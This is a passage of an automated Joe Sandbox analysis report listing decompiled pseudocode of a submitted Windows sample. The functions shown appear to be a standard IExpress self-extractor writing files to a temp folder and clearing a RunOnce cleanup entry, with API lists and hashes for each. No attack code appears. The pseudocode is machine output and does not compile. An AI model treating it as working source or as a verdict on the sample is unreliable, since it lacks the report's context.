                              						E010E65E8( &_v268);
                              					}
                              					SetCurrentDirectoryA(".."); // executed
                              					_t22 =  &_v268;
                              					E010E2390( &_v268);
                              					_t11 =  *0x10e8a20; // 0x0
                              				}
                              				if( *0x10e9a40 != 1 && _t11 != 0) {
                              					_t11 = E010E1FE1(_t22); // executed
                              				}
                              				 *0x10e8a20 =  *0x10e8a20 & 0x00000000;
                              				return E010E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                              			}













                              APIs
                              • SetFileAttributesA.KERNELBASE(034B71C0,00000080,?,00000000), ref: 010E52F2
                              • DeleteFileA.KERNELBASE(034B71C0), ref: 010E52FA
                              • LocalFree.KERNEL32(034B71C0,?,00000000), ref: 010E5305
                              • LocalFree.KERNEL32(034B71C0), ref: 010E530C
                              • SetCurrentDirectoryA.KERNELBASE(010E11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E5363
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E5334
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 2833751637-305352358
                              • Opcode ID: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                              • Instruction ID: 518f765314901b669bb77b40eb445f9db83545d19d8411b4a860956d17957d86
                              • Opcode Fuzzy Hash: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                              • Instruction Fuzzy Hash: 3721C635600214DFEB719B27ED0C7697BF4BB14B18F08859EF9C15B198CBBA9984CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E1FE1(void* __ecx) {
                              				void* _v8;
                              				long _t4;
                              				long _t7;
                              
                              				if( *0x10e8530 != 0) {
                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                              					if(_t4 == 0) {
                              						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                              						_t7 = RegCloseKey(_v8); // executed
                              						return _t7;
                              					}
                              				}
                              				return _t4;
                              			}







                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010E538C,?,?,010E538C), ref: 010E2005
                              • RegDeleteValueA.KERNELBASE(010E538C,wextract_cleanup0,?,?,010E538C), ref: 010E2017
                              • RegCloseKey.KERNELBASE(010E538C,?,?,010E538C), ref: 010E2020
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CloseDeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                              • API String ID: 849931509-702805525
                              • Opcode ID: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                              • Instruction ID: 3330ef93976aacdf2493b695b039fd2637ca96a8db1002e202aeabf09e7184da
                              • Opcode Fuzzy Hash: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                              • Instruction Fuzzy Hash: B7E04831650314FFD7319A93EC4EF597FEDE704B80F100195B98465056D7665A14D704
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E4CD0(char* __edx, long _a4, int _a8) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				int _t30;
                              				long _t32;
                              				signed int _t33;
                              				long _t35;
                              				long _t36;
                              				struct HWND__* _t37;
                              				long _t38;
                              				long _t39;
                              				long _t41;
                              				long _t44;
                              				long _t45;
                              				long _t46;
                              				signed int _t50;
                              				long _t51;
                              				char* _t58;
                              				long _t59;
                              				char* _t63;
                              				long _t64;
                              				CHAR* _t71;
                              				CHAR* _t74;
                              				int _t75;
                              				signed int _t76;
                              
                              				_t69 = __edx;
                              				_t29 =  *0x10e8004; // 0x9fdbf5b5
                              				_t30 = _t29 ^ _t76;
                              				_v8 = _t30;
                              				_t75 = _a8;
                              				if( *0x10e91d8 == 0) {
                              					_t32 = _a4;
                              					__eflags = _t32;
                              					if(_t32 == 0) {
                              						_t33 = E010E4E99(_t75);
                              						L35:
                              						return E010E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                              					}
                              					_t35 = _t32 - 1;
                              					__eflags = _t35;
                              					if(_t35 == 0) {
                              						L9:
                              						_t33 = 0;
                              						goto L35;
                              					}
                              					_t36 = _t35 - 1;
                              					__eflags = _t36;
                              					if(_t36 == 0) {
                              						_t37 =  *0x10e8584; // 0x0
                              						__eflags = _t37;
                              						if(_t37 != 0) {
                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                              						}
                              						_t54 = 0x10e91e4;
                              						_t58 = 0x10e91e4;
                              						do {
                              							_t38 =  *_t58;
                              							_t58 =  &(_t58[1]);
                              							__eflags = _t38;
                              						} while (_t38 != 0);
                              						_t59 = _t58 - 0x10e91e5;
                              						__eflags = _t59;
                              						_t71 =  *(_t75 + 4);
                              						_t73 =  &(_t71[1]);
                              						do {
                              							_t39 =  *_t71;
                              							_t71 =  &(_t71[1]);
                              							__eflags = _t39;
                              						} while (_t39 != 0);
                              						_t69 = _t71 - _t73;
                              						_t30 = _t59 + 1 + _t71 - _t73;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							L3:
                              							_t33 = _t30 | 0xffffffff;
                              							goto L35;
                              						}
                              						_t69 = 0x10e91e4;
                              						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t41 = E010E476D( &_v268, __eflags);
                              						__eflags = _t41;
                              						if(_t41 == 0) {
                              							goto L9;
                              						}
                              						_push(0x180);
                              						_t30 = E010E4980( &_v268, 0x8302); // executed
                              						_t75 = _t30;
                              						__eflags = _t75 - 0xffffffff;
                              						if(_t75 == 0xffffffff) {
                              							goto L3;
                              						}
                              						_t30 = E010E47E0( &_v268);
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						 *0x10e93f4 =  *0x10e93f4 + 1;
                              						_t33 = _t75;
                              						goto L35;
                              					}
                              					_t44 = _t36 - 1;
                              					__eflags = _t44;
                              					if(_t44 == 0) {
                              						_t54 = 0x10e91e4;
                              						_t63 = 0x10e91e4;
                              						do {
                              							_t45 =  *_t63;
                              							_t63 =  &(_t63[1]);
                              							__eflags = _t45;
                              						} while (_t45 != 0);
                              						_t74 =  *(_t75 + 4);
                              						_t64 = _t63 - 0x10e91e5;
                              						__eflags = _t64;
                              						_t69 =  &(_t74[1]);
                              						do {
                              							_t46 =  *_t74;
                              							_t74 =  &(_t74[1]);
                              							__eflags = _t46;
                              						} while (_t46 != 0);
                              						_t73 = _t74 - _t69;
                              						_t30 = _t64 + 1 + _t74 - _t69;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							goto L3;
                              						}
                              						_t69 = 0x10e91e4;
                              						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                              						_t30 = E010E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						E010E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                              						__eflags = _t50;
                              						if(_t50 != 0) {
                              							_t51 = _t50 & 0x00000027;
                              							__eflags = _t51;
                              						} else {
                              							_t51 = 0x80;
                              						}
                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						} else {
                              							_t33 = 1;
                              							goto L35;
                              						}
                              					}
                              					_t30 = _t44 - 1;
                              					__eflags = _t30;
                              					if(_t30 == 0) {
                              						goto L3;
                              					}
                              					goto L9;
                              				}
                              				if(_a4 == 3) {
                              					_t30 = E010E4B60( *((intOrPtr*)(_t75 + 0x14)));
                              				}
                              				goto L3;
                              			}
































                              APIs
                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010E4DB5
                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010E4DDD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AttributesFileItemText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 3625706803-305352358
                              • Opcode ID: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                              • Instruction ID: 6a74f7a0d8011e3e3be5f296a84a21226e159b22aa6c832b8d7258e85f33f5a8
                              • Opcode Fuzzy Hash: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                              • Instruction Fuzzy Hash: B14126366081068FDB75AE3ED94C6F977E6EB45700F0486E8D8C2D7285DA33DA46C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4C37(signed int __ecx, int __edx, int _a4) {
                              				struct _FILETIME _v12;
                              				struct _FILETIME _v20;
                              				FILETIME* _t14;
                              				int _t15;
                              				signed int _t21;
                              
                              				_t21 = __ecx * 0x18;
                              				if( *((intOrPtr*)(_t21 + 0x10e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t14 =  &_v12;
                              					_t15 = SetFileTime( *(_t21 + 0x10e8d74), _t14, _t14, _t14); // executed
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					return 1;
                              				}
                              			}









                              APIs
                              • DosDateTimeToFileTime.KERNEL32 ref: 010E4C54
                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010E4C66
                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 010E4C7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Time$File$DateLocal
                              • String ID:
                              • API String ID: 2071732420-0
                              • Opcode ID: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                              • Instruction ID: 1738ac42376a1007c5b88f23f4ac824ec6114280dfd98740227646bfae8525a4
                              • Opcode Fuzzy Hash: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                              • Instruction Fuzzy Hash: 7DF0967260020DBFABA9DFAACC4CDFB7BEDEB0C644744456BA695C3000E635E524C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E010E487A(CHAR* __ecx, signed int __edx) {
                              				void* _t7;
                              				CHAR* _t11;
                              				long _t18;
                              				long _t23;
                              
                              				_t11 = __ecx;
                              				asm("sbb edi, edi");
                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                              				if((__edx & 0x00000100) == 0) {
                              					asm("sbb esi, esi");
                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                              				} else {
                              					if((__edx & 0x00000400) == 0) {
                              						asm("sbb esi, esi");
                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                              					} else {
                              						_t23 = 1;
                              					}
                              				}
                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                              				if(_t7 != 0xffffffff || _t23 == 3) {
                              					return _t7;
                              				} else {
                              					E010E490C(_t11);
                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                              				}
                              			}








                              APIs
                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010E4A23,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E48DE
                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E4902
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                              • Instruction ID: 69ab8053d9bca5e0fe377f073cbc630bc70c3822a907f30e8c5a8e4f8130daae
                              • Opcode Fuzzy Hash: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                              • Instruction Fuzzy Hash: 4D0162A3E115702AF364402A4C8CFFB559CCBD6634F1B0375BEEAE71C1D5585C0481E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E4AD0(signed int _a4, void* _a8, long _a12) {
                              				signed int _t9;
                              				int _t12;
                              				signed int _t14;
                              				signed int _t15;
                              				void* _t20;
                              				struct HWND__* _t21;
                              				signed int _t24;
                              				signed int _t25;
                              
                              				_t20 =  *0x10e858c; // 0x26c
                              				_t9 = E010E3680(_t20);
                              				if( *0x10e91d8 == 0) {
                              					_push(_t24);
                              					_t12 = WriteFile( *(0x10e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                              					if(_t12 != 0) {
                              						_t25 = _a12;
                              						if(_t25 != 0xffffffff) {
                              							_t14 =  *0x10e9400; // 0x9aa00
                              							_t15 = _t14 + _t25;
                              							 *0x10e9400 = _t15;
                              							if( *0x10e8184 != 0) {
                              								_t21 =  *0x10e8584; // 0x0
                              								if(_t21 != 0) {
                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10e93f8, 0);
                              								}
                              							}
                              						}
                              					} else {
                              						_t25 = _t24 | 0xffffffff;
                              					}
                              					return _t25;
                              				} else {
                              					return _t9 | 0xffffffff;
                              				}
                              			}












                              APIs
                                • Part of subcall function 010E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010E4B05
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              • Opcode ID: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                              • Instruction ID: 679576c095e4b5bba4113c302947220015081da83ade526100ecf983f585c37a
                              • Opcode Fuzzy Hash: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                              • Instruction Fuzzy Hash: E00184712002019FDB658F6BDC09BA67BD9B744B25F048265FAB9DF1D4CB7A9811CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E658A(char* __ecx, void* __edx, char* _a4) {
                              				intOrPtr _t4;
                              				char* _t6;
                              				char* _t8;
                              				void* _t10;
                              				void* _t12;
                              				char* _t16;
                              				intOrPtr* _t17;
                              				void* _t18;
                              				char* _t19;
                              
                              				_t16 = __ecx;
                              				_t10 = __edx;
                              				_t17 = __ecx;
                              				_t1 = _t17 + 1; // 0x10e8b3f
                              				_t12 = _t1;
                              				do {
                              					_t4 =  *_t17;
                              					_t17 = _t17 + 1;
                              				} while (_t4 != 0);
                              				_t18 = _t17 - _t12;
                              				_t2 = _t18 + 1; // 0x10e8b40
                              				if(_t2 < __edx) {
                              					_t19 = _t18 + __ecx;
                              					if(_t19 > __ecx) {
                              						_t8 = CharPrevA(__ecx, _t19); // executed
                              						if( *_t8 != 0x5c) {
                              							 *_t19 = 0x5c;
                              							_t19 =  &(_t19[1]);
                              						}
                              					}
                              					_t6 = _a4;
                              					 *_t19 = 0;
                              					while( *_t6 == 0x20) {
                              						_t6 = _t6 + 1;
                              					}
                              					return E010E16B3(_t16, _t10, _t6);
                              				}
                              				return 0x8007007a;
                              			}













                              APIs
                              • CharPrevA.USER32(010E8B3E,010E8B3F,00000001,010E8B3E,-00000003,?,010E60EC,010E1140,?), ref: 010E65BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              • Opcode ID: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                              • Instruction ID: c0b904de67f717a9ee651895ea08f9bbcb724c232487cede38f1810eddd7d1c0
                              • Opcode Fuzzy Hash: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                              • Instruction Fuzzy Hash: 50F02D333042509FD331051FA88CBA7BFD99BA5150F18059AE9DAC3205CA678C4583A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E621E() {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t5;
                              				void* _t9;
                              				void* _t13;
                              				void* _t19;
                              				void* _t20;
                              				signed int _t21;
                              
                              				_t5 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t5 ^ _t21;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					0x4f0 = 2;
                              					_t9 = E010E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                              				} else {
                              					E010E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                              					 *0x10e9124 = E010E6285();
                              					_t9 = 0;
                              				}
                              				return E010E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                              			}












                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010E623F
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                              • String ID:
                              • API String ID: 381621628-0
                              • Opcode ID: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                              • Instruction ID: 8530d7e38d47f2aac357c3d35eac177b4d3b8ebdf6aa9413968ed63a4110be84
                              • Opcode Fuzzy Hash: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                              • Instruction Fuzzy Hash: B6F0B4B0700209AFD760EB769D09BFE36E8DBA4700F40046AA9C5DB181DD769D408750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4B60(signed int _a4) {
                              				signed int _t9;
                              				signed int _t15;
                              
                              				_t15 = _a4 * 0x18;
                              				if( *((intOrPtr*)(_t15 + 0x10e8d64)) != 1) {
                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x10e8d74)); // executed
                              					if(_t9 == 0) {
                              						return _t9 | 0xffffffff;
                              					}
                              					 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                              					return 0;
                              				}
                              				 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                              				 *((intOrPtr*)(_t15 + 0x10e8d68)) = 0;
                              				 *((intOrPtr*)(_t15 + 0x10e8d70)) = 0;
                              				 *((intOrPtr*)(_t15 + 0x10e8d6c)) = 0;
                              				return 0;
                              			}






                              APIs
                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010E4FA1,00000000), ref: 010E4B98
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                              • Instruction ID: c7ba197bcc2132f7268aa845f62ac84d73f6853271aa91bbbc14ddbf1f7a6f80
                              • Opcode Fuzzy Hash: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                              • Instruction Fuzzy Hash: 2DF01231508B09AE4771EE2FCC0469ABBE6AAD52603108A2F96EED2150E7326451EB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E66AE(CHAR* __ecx) {
                              				unsigned int _t1;
                              
                              				_t1 = GetFileAttributesA(__ecx); // executed
                              				if(_t1 != 0xffffffff) {
                              					return  !(_t1 >> 4) & 0x00000001;
                              				} else {
                              					return 0;
                              				}
                              			}





                              APIs
                              • GetFileAttributesA.KERNELBASE(?,010E4777,?,010E4E38,?), ref: 010E66B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                              • Instruction ID: ffd0b99994ef6290eae1a293619863751dde55230216a18d774198c9ede6c646
                              • Opcode Fuzzy Hash: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                              • Instruction Fuzzy Hash: 46B09276232440866A611636782955628C1A6C563ABE52B91F072C11D4CA3FD546D504
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4CA0(long _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalAlloc(0, _a4); // executed
                              				return _t2;
                              			}





                              APIs
                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 010E4CAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AllocGlobal
                              • String ID:
                              • API String ID: 3761449716-0
                              • Opcode ID: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                              • Instruction ID: b2ec98124c7ca023bcd8908504b16c9d46b3bf3390fdd05d8bca199a594103ce
                              • Opcode Fuzzy Hash: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                              • Instruction Fuzzy Hash: ABB0123314420CF7CF101EC3E809F853F5DE7C8B61F150000F60C4A0408A7795108795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4CC0(void* _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalFree(_a4); // executed
                              				return _t2;
                              			}





                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
